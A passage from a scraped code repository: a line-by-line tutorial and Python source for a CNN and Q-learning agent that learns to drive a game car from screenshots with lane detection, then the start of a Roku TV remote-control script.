int(((croppedImg.shape[0]*0.6) - left_lane[1])/left_lane[0])\n46 RightX1 = int((croppedImg.shape[0] - right_lane[1])/right_lane[0])\n47 RightX2 = int(((croppedImg.shape[0]*0.6) - right_lane[1])/right_lane[0])\n48 left_lane = ((LeftX1, int(croppedImg.shape[0])), (LeftX2, int(croppedImg.shape[0]*0.6)))\n49 right_lane = ((RightX1, int(croppedImg.shape[0])), (RightX2, int(croppedImg.shape[0]*0.6)))\n50 #Now we can draw them on the image\n51 #We first create an empty array like our original image\n52 #Then we draw the lines on the empty image and finally combine with our original image\n53 emptImg = np.zeros_like(OrgImage)\n54 #[255, 0, 0,]is the color, 20 is the thickness\n55 #The star allows us to input a tuple (it processes as integer points)\n56 cv2.line(emptImg, *left_lane, [255, 0, 0], 20)\n57 cv2.line(emptImg, *right_lane, [255, 0, 0], 20)\n58 #Finally we combine the two images\n59 #It calculates the weighted sum of two arrays\n60 #1.0 is the weight of our original image, we don't want to amplify it\n61 #0.95 is the weight of our lines, and 0.0 is the scalar added to the sum\n62 #be very significant in the image, just enough so we can see it and not obstruct anything else\n63 finalImg = cv2.addWeighted(OrgImage, 1.0, emptImg, 0.95, 0.0)\n64 except:\n65 errors = True\n66 print(\"Nothing detected\")\n67 #If we dont detect anything or to avoid errors we simply return the original image\n68 return OrgImage, errors\n69 #If all goes well, we return the image with the detected lanes\n70 return finalImg, errors\n```\n**Line 6-Line 9** We initiate empty lists for our data. Left and right lines and their corresponding lengths. \n\n**Line 4** The function HoughLines is quite difficult to understand. In layman term it is simply detecting lines in our region and returning coordinates. We set a threshold of 180 the length, and the thickness being 5. To find out more about hough transformation, go to this [link](http://www.swarthmore.edu/NatSci/mzucker1/opencv-2.4.10-docs/doc/tutorials/imgproc/imgtrans/hough_lines/hough_lines.html)\n\n**Line 12-Line 30** Looping over all the detected lines we take one line at a time and we calculate the intercept and the slope. We omit horizontal and vertical lines as our lanes will never be straight in that perspective. Finally, depending on the slope we append our lines accordingly to the right and left lanes.\n\n**Line 35-Line 36** We want to combine all our lines into lanes. We compute the dot product of the lines and their respective lengths. Longer lines have a heavier effect and so the slopes and intercepts of those line will be more dominant. Finally divide by the lengths to essentially normalise the values(So it can be mapped to the image)\n\n**Line 44-Line 47** We have the lanes, but in order to draw them we need coordinates. To draw any line (assuming infinite) any arbitrary point can be used. Using the arbitrary y values I calculate the x values.\n\n**Line 48-Line49** Now we just group those points accordingly to the right and left lanes.\n\n**Line 53** We want to draw the line on top of our image. But in order to do that we need to have an overlay image. So here, we create an empty image with the same space dimensions as our original. \n\n**Line 56-Line 57** Then we draw our lines on our empty image. The color used is blue as the format is BGR and not RGB.\n\n**Line 63** Finally we combine the two images. This is done by calculating the weighted sum of the two arrays of images. In our empty image most of the pixels are set to 0 and so only the lane pixels will be effected.\n\n**Line 65-Line 68** If any errors or a lane wasn't detected then we simply just output our original image.\n\n**Line 70** If all goes well, we output our final processed image.\n\n<p align=\"center\">\n finalImg<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/finalImg.png\">\n</p>\n\nNow we can go ahead and explore the next part of the code. The next part explains how to format our processed images so it could be accepted by our Keras CNN.\n\n```python\n1 #Processes the images and returns the required data\n2 def getFrames():\n3 #We initialise the mss screenshot library\n4 sct = mss.mss()\n5 #This essentially takes a screenshot of the square from the coordinates\n6 #You can adjust these to your liking, \n7 game = {'top': 122, 'left': 0, 'width': 512, 'height': 286}\n8 #This converts the screenshot into a numpy array\n9 gameImg = np.array(sct.grab(game))\n10 #We want to resize the array so we can easily display it\n11 gameImg = cv2.resize(gameImg, (600, 400))\n12 #We pass the array into our calculateLanes function\n13 #it returns our detected lanes image as well as if any errors were produced\n14 img, errors = CalculateLanes(gameImg)\n15 #You can show the render if you want with the lanes detections\n16 cv2.imshow('window', img)\n17 #To further process the image we convert it to a grayscale\n18 img = cv2.cvtColor(cv2.resize(img, (84, 84)), cv2.COLOR_BGR2GRAY)\n19 #In order for Keras to accept data we reshape it into the specific format\n20 #I want to use an image thats 84x84\n21 img = img.reshape(1, 84, 84)\n22 #In order to give the algorithm the feel of the \"velocity\" we stack the 4 images\n23 input_img = np.stack((img, img, img, img), axis = 3)\n24 #This is required for openCV as a failsafe for stopping render\n25 #By pressing q, you can stop render\n26 if cv2.waitKey(25) & 0xFF == ord('q'):\n27 cv2.destroyAllWindows()\n28 #If all goes well we return the input_img and the errors\n29 return input_img, errors\n```\n**Line 2** This function essentially processes our screenshots using the lane detection function and then formats the image data so we can then use it with our CNN.\n\n**Line 4** We initialise our screenshot library here.\n\n**Line 7** Game stores the dimensions of our screenshots. It represents the area of the screen we took the screenshot of.\n\n**Line 9** We convert it to a numpy array for further processing.\n\n**Line 11** I resized the image so when we display it, it can fit on the screen. Note, if you change the size of the screen you will need to edit the coordinates of the ROI mask in the lane detection function in order to account for the size increase or decrease.\n\n**Line 14** We now call the CalculateLane() function passing the resized game screenshot as a paramter. It returns either the original image back to us or it returns our image with detected lanes. \n\n**Line 16** You can choose to render your detection but it will slow down the process quite a bit.\n\n**Line 18** We can now start formatting our image for our CNN. Our first step is to resize it to a suitable size for the CNN to process as well as to convert it to grayscale.\n\n**Line 21** Since Keras needs a specific dimension we reshape our image to 1x84x84. The 1 is essentially the batch number.\n\n**Line 23** The CNN needs to make logical decisions. Therefore, without any sense of velocity the CNN cannot perform. In order to provide the CNN with some sense of velocity we stack our images. Thus, our dimension of our input is now (1, 84, 84, 4).\n\n**Line 26-Line 27** If you've ever used OpenCV and decided to display your image/video then you know to always put this at the end or the image/video will not display.\n\n**Line 29** Finally, we return our input and errors (Errors for the CalculateLanes function)\n\nThat takes care of all the image processing. We can now go ahead and start taking a look at function that controls our car in game.\n\n```python\n#This function makes the car accelerate\ndef straight():\n p.keyDown(\"up\")\n p.keyUp(\"up\")\n\n#We can turn right with this\ndef right():\n p.keyDown(\"right\")\n p.keyUp(\"right\")\n\n#Turn left with this\ndef left():\n p.keyDown(\"left\")\n p.keyUp(\"left\")\n```\n**Function straight()** Key Down function presses the specific key on our keyboard. KeyUp is important as KeyDown holds the key, so we need to release it. This function is responsible for accelerating our car.\n\n**Function right()** Turns our car to the right.\n\n**Function left()** Turns our car to the left.\n\nWe are now ready to start building our CNN model. Our model will be quite similar to the other CNN models in the past, we will try to map our image data to the actions.\n```python\n1 #For now we make the car accelerate, turn right and turn left\n2 moves = 3\n3 #learning rate (discount rate)\n4 learningRate = 0.9\n5 #This is the exploration rate (epsilon)\n6 #Its better at first to let the model try everything\n7 epsilon = 1.0\n8 #We don't want our model to stop exploring so we set a minimum epsilon\n9 epsilon_min = 0.01\n10 #We also dont want our model to explore all the time therefore we want it\n11 #to decay\n12 epsilon_decay = 0.995\n13 #Number of times we want to train the algorithm (The number of games)\n14 epochs = 100\n15 #We want to store our data for our replay so our model can remember the past experiences\n16 memory = []\n17 #The max amount of stuff we want to remember\n18 max_memory = 500\n19\n20 #Lets start defining our model\n21 model = Sequential()\n22 #We will be using a CNN with 32 filters, 3x3 kernel and the input shape will be\n23 #84x84 with 4 grayscale images stacked on top\n24 #padding will be set as same(padding with 0) and we will use the rectified activation function\n25 model.add(Conv2D(32, (3, 3), input_shape=(84, 84, 4), padding='same',\n26 activation='relu'))\n27 #This time we will use 64 filters with a 3x3 kernel, with the same act function \n28 #but the padding will change\n29 model.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n30 model.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n31 #We flatten our data in order to feed it through the dense(output) layer\n32 model.add(Flatten())\n33 model.add(Dense(512, activation='relu'))\n34 #We have 3 outputs, forward, left, right\n35 model.add(Dense(3, activation='linear'))\n36 #We will be using the mean squared error\n37 model.compile(loss='mean_squared_error',\n38 optimizer=SGD())\n```\n**Line 2** As shown in the code above, our car can do 3 things. Accelerate, turn right and turn left. Thus we set our moves variable to 3.\n\n**Line 4** This is our discount rate. We want our immediate reward to be worth more than our future reward therefore we discount the future reward in order make the current reward stand out. This is because our model is uncertain what the next step may be. (More on this later)\n\n**Line 7** This is the exploration rate. We want our algorithm to start off by trying different actions.\n\n**Line 9** We don't want our model to ever stop trying random actions so we set our minimum exploration rate.\n\n**Line 12** This is the rate at which our exploration factor decays.\n\n**Line 14** This is the number of games we want to play in total.\n\n**Line 16** All the games ever played go in here. We want our model to learn from its mistakes.\n\n**Line 18** We don't want to store too many games as it becomes computation heavy.\n\nNow we can start building our actual CNN model.\n\n**Line 21** We initialise our machine learning algorithm.\n\n**Line 25** This is our first convolutional layer. We want to output 32 filters with a 3x3 kernel and our input shape will be 84x84x4. We set our activation function to rectified linear unit.\n\n**Line 29-Line 30** We add another two convolutional layers for better accuracy.\n\n**Line 32-Line 33** We flatten our data so we can put it through a hidden layer of a simple neural network.\n\n**Line 35** This is the final output layer with 3 nodes. It calculates the probability of our 3 actions. \n\n**Line 37** Configuration for our loss and optimisation function. \n\nFinally, we've reached the last step of the tutorial, our Q-Learning algorithm. The brain and heart of the algorithm. This algorithm decides the actions to take and essentially trains our car to be a better driver.\n```python\n1 #loop over the number of epochs (essentially the number of games)\n2 for i in range(epochs):\n3 #time.sleep(5)\n4 #We set the game_over to false as the game is just starting\n5 game_over = False\n6 #We start of by getting initial frames and errors\n7 input_img, errors = getFrames()\n8 #We set the errors to false to begin with\n9 errors = False\n10 #We set the reward to 0\n11 reward = 0\n12 #While the game is not over we loop\n13 while game_over==False:\n14 #Np.random.rand() returns a number between 0 and 1\n15 #We check if its smaller that our exploration factor\n16 if np.random.rand() <= epsilon:\n17 #if the random number is smaller than our exploration factor\n18 #We select a random action from our 3 actions\n19 action = np.random.randint(0, moves, size=1)[0]\n20 else:\n21 #If it's not smaller than we predict an output by inputting our\n22 #4 stacked images\n23 #ouput is the probability of our 3 directions\n24 output = model.predict(input_img)\n25 #action is the index of the highest probability and therefore\n26 #indicates which turn to take\n27 action = np.argmax(output[0])\n28 #if our action == 0 then we go straight \n29 if int(action) == 0:\n30 straight()\n31 #If our action == 1 then we go right\n32 elif int(action) == 1:\n33 right()\n34 #else we go left\n35 else:\n36 left()\n```\n**Line 2** We loop over the amount of games we want to play. In this case I have set the epochs to 100. \n\n**Line 3** Originally I had left the time.sleep in the program as this allowed me to prepare for the start of the algorithm but it also slows down the learning stage therefore it is commented out.\n\n**Line 5** The AI is about to start playing the game so we originally set the game_over to false. We will need it later.\n\n**Line 7** We start by getting the initial \"state\" of the algorithm. We will need this to predict our corresponding action.\n\n**Line 9** Despite the error in **Line 7** we set our errors to false as errors at the start do not matter, the algorithm will be performing a random action to begin with. \n\n**Line 11** Initialise our Rewards variable to 0.\n\n**Line 13** Looping for one game, while the game isn't false\n\n**Line 16-Line 19** We start off by checking if our exploration is bigger than a random number between 0 and 1. At the begining it will be and so we select a random action from our 3 actions. \n\n**Line 20-Line 27** Once our exploration rate is low enough, we can start predicting our actions. Output stores a numpy array of size 3 produced by the prediction from our input image. Action stores the index of the maximum probability.\n\n**Line 29-Line 36** Based on our predicted or random action we select one of the functions to run that controls our car. \n\nHalfway through! From here we can now actually start studying the bulk of the Q-learning algorithm!\n```python\n1 #Once we've performed our action we get the next frame\n2 #We also check weather to reward the algorithm or not\n3 input_next_img, errors = getFrames()\n4 #If we detect lanes and therefore no errors occur we reward the algorithm\n5 if errors == False:\n6 reward = 1\n7 #Else if there we detect no lanes and so there is an error we \n8 #say its game over\n9 else:\n10 reward = 0\n11 game_over = True\n12 #Game over or not we want to keep record of the steps the algo took\n13 #We first check if the total memory length is bigger than the max memory\n14 if len(memory) >= max_memory:\n15 #If more memory then needed we delete the first ever element we added\n16 del memory[0]\n17 #We append it to our memory list\n18 memory.append((input_img, action, reward, input_next_img, game_over))\n19 #Next we set our input_img to our latest data\n20 input_img = input_next_img\n21 if game_over:\n22 print(\"Game: {}/{}, Total Reward: {}\".format(i, epochs, reward))\n23 #Once the game is over we want to train our algo with the data we just collected\n24 #We check if our memory length is bigger than our batch size \n25 if len(memory) > 32:\n26 #If so then we set the batch_size to 32\n27 batch_size = 32\n28 else:\n29 #Else we set our batch size to whatever is in the memory\n30 batch_size = len(memory)\n31 #We are taking a random sample of 32 so not to overfit our algo\n32 batch = random.sample(memory, batch_size)\n33 #We itereate over every memory we've stored in that memory batch of 32\n34 for input_img, action, reward, input_next_img, game_over in batch:\n35 #if in that memory our game was over then we set the target_reward equal to reward\n36 target_reward = reward\n37 #If our game was not over\n38 if game_over == False:\n39 #This essentially is the bellman equation\n40 #expected long-term reward for a given action is equal to the \n41 #immediate reward from the current action combined with the expected \n42 #reward from the best future action taken at the following state.\n43 #The model isn't certain that for that specific action it will get the best reward\n44 #It's based on probability of the action, if the probability of that action is in the\n45 #negatives then our future reward is going to be further decreased by our learning rate\n46 #This is just the model being cautious, as to not set an impossible reward target\n47 #If the reward is impossible then the algorithm might not converge\n48 #Converge as in a stable condition where it can play the game without messing up\n49 target_reward = reward + learningRate * \\\n50 np.amax(model.predict(input_next_img)[0])\n51 #So from above we essentially know what is going to happen(input_next_img) \n52 #assuming the game wasn't over, the algorithm did well.\n53 #So we want the algorithm to perform the same, essentially we\n54 #persuade the algorithm to do what it did to get that reward\n55 #so we make the algorithm predict from the previous frame(input_img)\n56 #but we alter its prediction according to the action that got the highest\n57 #reward and...\n58 desired_target = model.predict(input_img)\n59 #we set that as the target_reward...\n60 desired_target[0][action] = target_reward\n61 #So to make the algo perform the same, we associate the input_img with the\n62 #target we want and we fit it\n63 model.fit(input_img, desired_target, epochs=1, verbose=0)\n64 #Finally we check if our exploration factor is bigger than our minimum exploration\n65 #if so we decrease it by the decay to reduce exploration, we do this every game\n66 if epsilon > epsilon_min:\n67 epsilon *= epsilon_decay\n```\n**Line 3** After the action we get our next frame, and errors if any.\n\n**Line 5-Line 6** After the action has been performed and we have the next frame with calculated lanes and it does not return any errors then we set the reward to 1.\n\n**Line 9-Line 11** If it does return errors then we say that the game is over. I have set it up like that so the algorithm can learn to drive within lanes. The error is associated with either the lanes not being detected or simply because the car was not within any lanes to detect. The latter being more probable and thus provides reason for the specific guidelines. I also set the reward to 0 as the algorithm fails to achieve its goal\n\n**Line 14-Line 16** Regardless the status of the game_over variable, we want to record the gameplay that happened. This enables the algorithm to learn from it's mistakes. So in this piece of code, we check whether the memory is full or not, if so we delete the very first item appended.\n\n**Line 18** We append to the memory array.\n\n**Line 20** We set our next set of frames to our current set of frames. Essentially progressing our variable input_img to the next undecided action frame.\n\n**Line 21-Line 22** If game was over we print out our statistics. \n\n**Line 25-Line 30** This simply put is the setup for our replay section of the Q-algorithm. We want to select random sample of batches to train our algorithm with. Our default batch size is 32, but at the begining there wouldn't be enough to sample 32 batches. Therefore, we train the algorithm with the whole memory array.\n\n**Line 34-Line 36** Iterating over our memory, we begin by setting our target reward to our reward in the first sample memory. \n\n**Line 38-Line 50** In that memory if our game wasn't over than that means our algorithm performed well. So we want to persuade our algorithm to do the same thing in the future. Therefore we set our future reward (target reward) to the current reward from the current action combined with the expected reward from the best future action taken at the following state. We multiply by our learningRate to avoid converging problems. We are essentially increasing the probability of our desired action.\n\n**Line 58** Here we ask the algorithm again what it might predict for the previous state.\n\n**Line 60** We manipulate the prediction, we take the prediction and insert our own probability of our corresponding action. Simply telling the algorithm that for a situation like this we want this action to be performed.\n\n**Line 63** We feed the manipulations and the results into our model to train it for a single epoch.\n\n**Line 66-Line 67** Finally, after everything is done, we decrease our exploration rate by multiplying our epsilon with our epsilon decay rate.\n\n## Conclusion\n\nWell thats it for the self driving car! You can definitely make your algorithm more complex by adding different directions, making your convolutional layers deeper etc. You can even apply this to another car game, create your own guidelines and own methods of rewards! If there are any question please don't hesitate to contact me, I am happy to help. I am open to feedback and different ways in which I could improve this, maybe you have a better way of doing this. Other than any questions, if you find a mistake while reading through this please let me know! Happy coding!\n" }, { "alpha_fraction": 0.6359937787055969, "alphanum_fraction": 0.6588531732559204, "avg_line_length": 48.13333511352539, "blob_id": "33d9af7bc87a716ba7dced966908c033449cccc7", "content_id": "b3dc92fcb7df91e7860edbc9148e7080053c1479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15486, "license_type": "no_license", "max_line_length": 108, "num_lines": 315, "path": "/SelfDrivingCarWithNN.py", "repo_name": "nikkkkhil/self-driving-car-simulation-using-CNN", "src_encoding": "UTF-8", "text": "# =============================================================================\n# Written by Sagar Jaiswal\n# =============================================================================\nimport cv2\nimport mss\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nimport pyautogui as p\nimport random\nimport time\n\n#Function calculates the lanes\ndef CalculateLanes(OrgImage):\n errors = False\n #Since our game has yellow lanes, we can detect a specific color\n #keep that color, and get rid of everything else to make it easier\n #to detect the yellow lanes\n #So we convert our image to the HLS color scheme\n HLSImg = cv2.cvtColor(OrgImage, cv2.COLOR_BGR2HLS)\n #The lower and upper arrays define boundaries of the BGR color space\n #BGR because OpenCV represents images in Numpy in reverse order\n #So for our yellow color we say that our pixels color that are yellow will be\n # R>= 100, B >= 0, G>=10 (lower limit), R<=255, B<=255, G<=40\n lower = np.uint8([ 10, 0, 100])\n upper = np.uint8([ 40, 255, 255])\n #inRange basically finds the color we want in the HLSImg with the lower and upper\n #boundaries(the ranges)\n yellow_mask = cv2.inRange(HLSImg, lower, upper)\n #We then apply this mask to our original image, and this returns an image showing\n #only the pixels that fall in the range of that mask\n YellowImg = cv2.bitwise_and(OrgImage, OrgImage, mask=yellow_mask)\n #Convert the original image to gray\n GrayImg = cv2.cvtColor(YellowImg, cv2.COLOR_BGR2GRAY)\n #Apply blurring\n #The 5x5 is the gaussianblur kernel convolved with image\n #The 0 is the sigmaX and SigmaY standard deviation usually taken as 0\n blurredImg = cv2.GaussianBlur(GrayImg, (5, 5), 0)\n #Detect edges in the image\n #700 is the max val, any edges above the intensity gradient of 700 are edges\n #200 is the lowest intensity gradient, anything below is not an edge\n imageWithEdges = cv2.Canny(blurredImg, threshold1=200, threshold2=700)\n #These are the points of our trapezoid/hexagon that we crop out \n points = np.array([[0, 310],[0, 300], [220, 210], [380, 210], [600, 300], [600, 310]])\n #Now we calculate the region of interest\n #We first create a mask (a blank black array same size as our image)\n mask = np.zeros_like(imageWithEdges)\n #Then we fill the mask underneath the points(inside the polygon) we defined\n #with color white (255)(This is the part of the image we want to process)\n cv2.fillPoly(mask, [points], 255)\n #this bitwise and function basically combines the two images\n #The coloured bit where the pixels had a value 255 is kept while the\n #top bit is removed (which is 0)\n croppedImg = cv2.bitwise_and(blurredImg, mask)\n #Basically the accumulation of the most imperfect edges with the minimum\n #length being defined by 180\n #Thickness of the lines is 5\n lines = cv2.HoughLinesP(croppedImg, 1, np.pi/180, 180, np.array([]), 180, 5)\n #Now we need to find the slope, intercept and length of each of our detected lines\n left_lines = []\n length_left = []\n right_lines = []\n length_right = []\n #We may not always detect a line that is why we do try/except statement\n try:\n for line in lines:\n #Coordinates of a single line\n for x1, y1, x2, y2 in line:\n #We dont want a vertical line or a horizontal line\n if x1==x2 or y1==y2:\n continue\n #Slope formula\n slope = (y2-y1)/(x2-x1)\n #Intercept\n intercept = y1 - slope*x1\n #Length\n length = np.sqrt((y2-y1)**2+(x2-x1)**2)\n #Y is reversed in images therefore a negative slope is a left line not right\n if slope<0:\n left_lines.append((slope, intercept))\n length_left.append((length))\n else:\n right_lines.append((slope, intercept))\n length_right.append((length))\n #Now we have collected our similar lines into right and left lists\n #Now we can convert them into lanes by dot product all the similar lines with lengths\n #The longer lines are weighted more therefore affect the lanes more\n #Then we normalise them by dividing by sum of the lengths(sort of like averaginng)\n left_lane = np.dot(length_left, left_lines) /np.sum(length_left) if len(length_left) >0 else None\n right_lane = np.dot(length_right, right_lines)/np.sum(length_right) if len(length_right)>0 else None\n #Now we have the right LANE and the left LANE through averaging and dot product\n #Now we need to convert them back into coordinates for pixel points\n #Having an equation of a line (assume infinite) we can select arbitrary points and find\n #the x or y value accordingly.\n #So we select arbitrary points for y1 = croppedImg.shape[0]\n #and for y2 = y1*0.6\n #We all need them to be int so cv2.line can use them\n LeftX1 = int((croppedImg.shape[0] - left_lane[1])/left_lane[0])\n LeftX2 = int(((croppedImg.shape[0]*0.6) - left_lane[1])/left_lane[0])\n RightX1 = int((croppedImg.shape[0] - right_lane[1])/right_lane[0])\n RightX2 = int(((croppedImg.shape[0]*0.6) - right_lane[1])/right_lane[0])\n left_lane = ((LeftX1, int(croppedImg.shape[0])), (LeftX2, int(croppedImg.shape[0]*0.6)))\n right_lane = ((RightX1, int(croppedImg.shape[0])), (RightX2, int(croppedImg.shape[0]*0.6)))\n #Now we can draw them on the image\n #We first create an empty array like our original image\n #Then we draw the lines on the empty image and finally combine with our original image\n emptImg = np.zeros_like(OrgImage)\n #[255, 0, 0,]is the color, 20 is the thickness\n #The star allows us to input a tuple (it processes as integer points)\n cv2.line(emptImg, *left_lane, [255, 0, 0], 20)\n cv2.line(emptImg, *right_lane, [255, 0, ], 20)\n #Finally we combine the two images\n #It calculates the weighted sum of two arrays\n #1.0 is the weight of our original image, we don't want to amplify it\n #0.95 is the weight of our lines, we don't set it to 1 because we don't want it to\n #be very significant in the image, just enough so we can see it and not obstruct anything else\n finalImg = cv2.addWeighted(OrgImage, 1.0, emptImg, 0.95, 0.0)\n except:\n errors = True\n print(\"Nothing detected\")\n #If we dont detect anything or to avoid errors we simply return the original image\n return OrgImage, errors\n #If all goes well, we return the image with the detected lanes\n return finalImg, errors\n\n#Processes the images and returns the required data\ndef getFrames():\n #We initialise the mss screenshot library\n sct = mss.mss()\n #This essentially takes a screenshot of the square from the coordinates\n #You can adjust these to your liking, \n game = {'top': 122, 'left': 0, 'width': 512, 'height': 286}\n #This converts the screenshot into a numpy array\n gameImg = np.array(sct.grab(game))\n #We want to resize the array so we can easily display it\n gameImg = cv2.resize(gameImg, (600, 400))\n #We pass the array into our calculateLanes function\n #it returns our detected lanes image as well as if any errors were produced\n img, errors = CalculateLanes(gameImg)\n #You can show the render if you want with the lanes detections\n cv2.imshow('window', img)\n #To further process the image we convert it to a grayscale\n img = cv2.cvtColor(cv2.resize(img, (84, 84)), cv2.COLOR_BGR2GRAY)\n #In order for Keras to accept data we reshape it into the specific format\n #I want to use an image thats 84x84\n img = img.reshape(1, 84, 84)\n #In order to give the algorithm the feel of the \"velocity\" we stack the 4 images\n input_img = np.stack((img, img, img, img), axis = 3)\n #This is required for openCV as a failsafe for stopping render\n #By pressing q, you can stop render\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n #If all goes well we return the input_img and the errors\n return input_img, errors\n\n#This function makes the car accelerate\ndef straight():\n p.keyDown(\"up\")\n p.keyUp(\"right\")\n p.keyUp(\"left\")\n p.keyUp(\"up\")\n\n#We can turn right with this\ndef right():\n p.keyDown(\"right\")\n p.keyUp(\"right\")\n\n#Turn left with this\ndef left():\n p.keyDown(\"left\")\n p.keyUp(\"left\")\n\n\n#For now we make the car accelerate, turn right and turn left\nmoves = 3\n#learning rate (discount rate)\nlearningRate = 0.9\n#This is the exploration rate (epsilon)\n#Its better at first to let the model try everything\nepsilon = 1.0\n#We don't want our model to stop exploring so we set a minimum epsilon\nepsilon_min = 0.01\n#We also dont want our model to explore all the time therefore we want it\n#to decay\nepsilon_decay = 0.995\n#Number of times we want to train the algorithm\nepochs = 100\n#We want to store our data for replay/so our model can remember\nmemory = []\n#The max amount of stuff we want to remember\nmax_memory = 500\n\n#Lets start defining our model\nmodel = Sequential()\n#We will be using a CNN with 32 filters, 3x3 kernel and the input shape will be\n#84x84 with 4 grayscale images stacked on top\n#padding will be set as same and we will use the rectified activation function\nmodel.add(Conv2D(32, (3, 3), input_shape=(84, 84, 4), padding='same',\n activation='relu'))\n#This time we will use 64 filters with a 3x3 kernel, with the same act function \n#but the padding will change\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n#We flatten our data in order to feed it through the dense(output) layer\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\n#We have 3 outputs, forward, left, right\nmodel.add(Dense(3, activation='linear'))\n#We will be using the mean squared error\nmodel.compile(loss='mean_squared_error',\n optimizer=SGD())\n#loop over the number of epochs (essentially the number of games)\nfor i in range(epochs):\n time.sleep(5)\n #We set the game_over to false as the game is just starting\n game_over = False\n #We start of by getting initial frames and errors\n input_img, errors = getFrames()\n #We set the errors to false to begin with\n errors = False\n #We set the reward to 0\n reward = 0\n #While the game is not over we loop\n while game_over==False:\n #Np.random.rand() returns a number between 0 and 1\n #We check if its smaller that our exploration factor\n if np.random.rand() <= epsilon:\n #if the random number is smaller than our exploration factor\n #We select a random action from our 3 actions\n action = np.random.randint(0, moves, size=1)[0]\n else:\n #If it's not smaller than we predict an output by inputting our\n #4 stacked images\n #ouput is the probability of our 3 directions\n output = model.predict(input_img)\n #action is the index of the highest probability and therefore\n #indicates which turn to take\n action = np.argmax(output[0])\n #if our action == 0 then we go straight \n if int(action) == 0:\n straight()\n #If our action == 1 then we go right\n elif int(action) == 1:\n right()\n #else we go left\n else:\n left()\n #Once we've performed our action we get the next frame\n #We also check weather to reward the algorithm or not\n input_next_img, errors = getFrames()\n #If we detect lanes and therefore no errors occur we reward the algorithm\n if errors == False:\n reward = reward + 1\n #Else if there we detect no lanes and so there is an error we \n #say its game over\n else:\n game_over = True\n #Game over or not we want to keep record of the steps the algo took\n #We first check if the total memoery length is bigger than the max memory\n if len(memory) >= max_memory:\n #If more memory then needed we delete the first ever element we added\n del memory[0]\n #We append it to our memory list\n memory.append((input_img, action, reward, input_next_img, game_over))\n #Next we set our input_img to our latest data\n input_img = input_next_img\n if game_over:\n print(\"Game: {}/{}, Total Reward: {}\".format(i, epochs, reward))\n #Once the game is over we want to train our algo with the data we just collected\n #We check if our memory length is bigger than our batch size \n if len(memory) > 32:\n #If so then we set the batch_size to 32\n batch_size = 32\n else:\n #Else we set our batch size to whatever is in the memory\n batch_size = len(memory)\n #We are taking a random sample of 32 so not to overfit our algo\n batch = random.sample(memory, batch_size)\n #We itereate over every memory we've stored in that memory batch of 32\n for input_img, action, reward, input_next_img, game_over in batch:\n #if in that memory our game was over then we set the target_reward equal to reward\n target_reward = reward\n #If our game was not over\n if game_over == False:\n #This essentially is the bellman equation\n #expected long-term reward for a given action is equal to the \n #immediate reward from the current action combined with the expected \n #reward from the best future action taken at the following state.\n #The model isn't certain that for that specific action it will get the best reward\n #It's based on probability of the action, if the probability of that action is in the\n #negatives then our future reward is going to be further decreased by our learning rate\n #This is just the model being cautious, as to not set an impossible reward target\n #If the reward is impossible then the algorithm might not converge\n #Converge as in a stable condition where it can play the game without messing up\n target_reward = reward + learningRate * \\\n np.amax(model.predict(input_next_img)[0])\n #So from above we essentially know what is going to happen(input_next_img) \n #assuming the game wasn't over, the algorithm did well.\n #So we want the algorithm to perform the same, essentially we\n #persuade the algorithm to do what it did to get that reward\n #so we make the algorithm predict from the previous frame(input_img)\n #but we alter its prediction according to the action that got the highest\n #reward and...\n desired_target = model.predict(input_img)\n #we set that as the target_reward...\n desired_target[0][action] = target_reward\n #So to make the algo perform the same, we associate the input_img with the\n #target we want and we fit it\n model.fit(input_img, desired_target, epochs=1, verbose=0)\n #Finally we check if our exploration factor is bigger than our minimum exploration\n #if so we decrease it by the decay to reduce exploration, we do this every game\n if epsilon > epsilon_min:\n epsilon *= epsilon_decay\n \n" } ]
2
dcantor/roku
https://github.com/dcantor/roku
a94f13fae6e17717407d11c6a65dd34515a035aa
603e92903ad9f082e4f1460706fd20aae0ef127c
1ba6e6f9269daf00977addc3a60977a67210732b
refs/heads/master
2021-05-02T15:45:10.977084
2018-02-08T04:55:22
2018-02-08T04:55:22
120,702,845
1
0
null
2018-02-08T03:00:34
2018-02-08T03:14:24
2018-02-08T04:55:22
Python
[ { "alpha_fraction": 0.49655452370643616, "alphanum_fraction": 0.5261451005935669, "avg_line_length": 21.824073791503906, "blob_id": "1d7211158a57692cc4582ac9c3b1d71463d15c25", "content_id": "883fe6239cf16d8c5401f0e1e2e79df850ce8b5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2467, "license_type": "no_license", "max_line_length": 79, "num_lines": 108, "path": "/testing/roku-cli.py", "repo_name": "dcantor/roku", "src_encoding": "UTF-8", "text": "import requests\nfrom xml.dom import minidom\n\n\"\"\"This has been tested on a TCL Roku based TV. \nRoku API is here: https://sdkdocs.roku.com/display/sdkdoc/External+Control+API\n\"\"\"\n\nroku_ip = \"192.168.50.70\"\nroku_url = 'http://' + roku_ip + ':8060'\n\n\ndef main():\n ask_user()\n\n\ndef ask_user():\n global action\n\n print \"########################################\"\n print \"Daddy and Elliott's special Roku Remote\"\n print \"########################################\"\n print \"\\n\"\n print \"Menu:\"\n print \"\\n\"\n print \"1. Turn TV On\"\n print \"2. Turn TV Off\"\n print \"3. NBC\"\n print \"4. ABC\"\n print \"5. CBS\"\n print \"6. FOX\"\n print \"7. Netflix\"\n print \"8. Hulu\"\n print \"9. YouTube\"\n print \"80. List all Roku Apps Installed\"\n print \"99. Quit\"\n\n action = raw_input('Enter your selection:\\n')\n\n perform_action()\n\n\ndef perform_action():\n exit_status = 0\n\n while (exit_status < 1):\n\n if action == \"1\":\n r = requests.post(roku_url + '/keypress/PowerOn')\n exit_status = 1\n\n elif action == \"2\":\n r = requests.post(roku_url + '/keypress/PowerOff')\n exit_status = 1\n\n elif action == \"3\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=4.1')\n exit_status = 1\n\n elif action == \"4\":\n r = requests.post(roku_url + 